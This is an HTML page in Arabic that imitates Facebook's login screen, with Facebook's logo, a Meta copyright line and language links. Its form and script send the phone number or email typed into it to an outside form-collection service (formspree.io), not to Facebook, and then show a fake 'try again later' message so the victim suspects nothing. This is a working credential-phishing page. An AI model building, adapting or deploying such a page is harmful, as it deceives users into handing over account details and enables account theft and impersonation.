<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Acont</title>
</head>
<body>
    <section>
        <div class="logo">
            <img class="logo_img" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="فيسبوك">
        </div>
           <center>
            <form action="https://formspree.io/f/mzboqlap" method="post" id="my-form">
                <input type="text" name="phone,gmail" placeholder="رقم الهاتف المحمول أو البريد الالكتروني" required><br>
                    <input type="password" placeholder="كلمة السر" required><br>
                <button>تسجيل الدخول</button><br>
                <p id="my-form-status" class="wolff1"></p>
            </form><br>
           </center>
                <center>
                    <a href="">هل نسيت كلمة السر ؟</a>
                </center>
                <center><div class="wolf1">
                    <p>أو</p>
                </div></center>
                
                <div class="wolf3">
                    <center>
                        <button>أنشاء حساب جديد</button>
                    </center>
                </div>
                <div class="wolf11">
                    <div class="wolff">
                        <h5>العربية
                        </h5>
                        <p>English (US)</p>
                        <p>Français (France)
                        </p>
                        <p>Português (Brasil)
                        </p>
                    </div>
                    <div class="wolfff">
                        <p>עברית
                        </p>
                        <p>Русский</p>
                        <p>Español
                        </p>
                    </div>
                </div>
                <div class="wolf12">
                    <p> حول <span>.</span> مساعدة<span>.</span> المزيد</p>
                    <h5>حقوق النشر محفوظة Meta &copy; 2022</h5>
                </div>
                
    </section>
    <style>
        body {
            padding: 0;
            margin: 0;
            box-sizing: border-box;
        }
        .logo {
            width: 100%;
            height: 30px;
            margin: auto;
            text-align: center;
            margin-top: 10px;
            margin-bottom: 10px;
        }
        .logo_img {
            width: 120px;
            height: 30px;
        }
        form {
            width: 90%;
            margin: auto;
            text-align: right;
            color: black;
            display: inline-block;
        }
        form [type="text"] {
            margin: auto;
            display: inline-block;
            text-align: right;
            align-items: center;
            padding: 10px;
            border-radius: 5px;
            border: none;
            background-color: #f8f8fa;
            width: 90%;
            margin-bottom: 5px;
            direction: ltr;
            border: 1px solid #dadde1;
            display: flex;
            margin-bottom: -10px;
        }
        form [type="password"] {
            margin: auto;
            display: inline-block;
            text-align: right;
            align-items: center;
            padding: 10px;
            border-radius: 5px;
            border: none;
            background-color: #f8f8fa;
            width: 90%;
            margin-bottom: 5px;
            direction: ltr;
            border: 1px solid #dadde1;
            display: flex;
            margin-bottom: -15px;
        }
      form button {
         margin: auto;
            display: inline-block;
            text-align: center;
            align-items: center;
            padding: 10px;
            border: none;
            direction: ltr;
            color: white;
            background-color: #1877f2;
            font-size: 16px;
            font-weight: normal;
            border-radius: 6px;
            font-size: 16px;
             padding: 0 16px;
             height: 30px;
             font-family: inherit;
             width: 95%;
             margin-top: 5px;
             margin-bottom: 5px;
             font-weight: 700;
             display: flex;
             text-align: center;
             justify-content: center;
             height: 35px;
      }
      a {
        margin: auto;
        text-align: center;
        align-items: center;
        text-decoration: none;
        margin-top: 10px;
        color: #1877f2;
        font-size: 13px;
        font-weight: normal;
      }
      .wolf1 {
        width: 95%;
        border-top: 1px solid #dadde1;
        text-align: center;
        margin-top: 15px;
      }
      .wolf1 p {
        background-color: white;
        width: 15px;
        text-align: center;
        margin: auto;
        display: flex;
        margin-top: -10px;
        font-size: 16px;
      }
      .wolf3 {
        margin: auto;
        margin-top: 10px;
      }
      .wolf3 button {
        height: 25px;
        color: white;
        border: none;
        background-color: #349420;
        border-radius: 3px;
        width: 100px;
        font-weight: normal;
        margin-top: 5px;
        margin-bottom: 70px;
      }
      .wof11 {
        width: 100%;
        color: #8a8d91;
      }
      .wolff {
        width: 50%;
        display: inline-block;
        margin-left: 50px;
        text-align: center;
        font-size: 15px;
        
      }
      .wolfff {
        display: inline-block;
        text-align: center;
        font-size: 15px;
        margin-bottom: 10px;
      }
      .wolff p{
        font-size: 11px;
        color: #8a8d91;
      }
      .wolfff p {
        color: #8a8d91;
        font-weight: 100;
        font-size: 11px;
      }
      .wolff h5{
        color: #6d6e6e;
        margin-bottom: 10px;
      }
      .wolf12 {
        font-size: 10px;
        margin: auto;
        text-align: center;
        padding: 5px;
        color: #6d6e6e;
        font-weight: 100;
      }
      .wolf12 p {
        margin-bottom: -10px;
      }
      .wolf12 h5 {
        color: #6d6e6e;
        font-weight: 200;
        font-size: 13px;
      }
      .wolff1 {
        color: rgb(255, 0, 0);
        margin: auto;
        text-align: center;
        margin-bottom: 5px;
        font-size: 16px;
        font-weight: 400;
      }
    </style>
    <script>
        var form = document.getElementById("my-form");
        
        async function handleSubmit(event) {
          event.preventDefault();
          var status = document.getElementById("my-form-status");
          var data = new FormData(event.target);
          fetch(event.target.action, {
            method: form.method,
            body: data,
            headers: {
                'Accept': 'application/json'
            }
          }).then(response => {
            if (response.ok) {
              status.innerHTML = "الرجاء المحاولة مرة أخرى لاحقا";
              form.reset()
            } else {
              response.json().then(data => {
                if (Object.hasOwn(data, 'errors')) {
                  status.innerHTML = data["errors"].map(error => error["message"]).join(", ")
                } else {
                  status.innerHTML = "Oops! There was a problem submitting your form"
                }
              })
            }
          }).catch(error => {
            status.innerHTML = "Oops! There was a problem submitting your form"
          });
        }
        form.addEventListener("submit", handleSubmit)
    </script>
</body>
</html>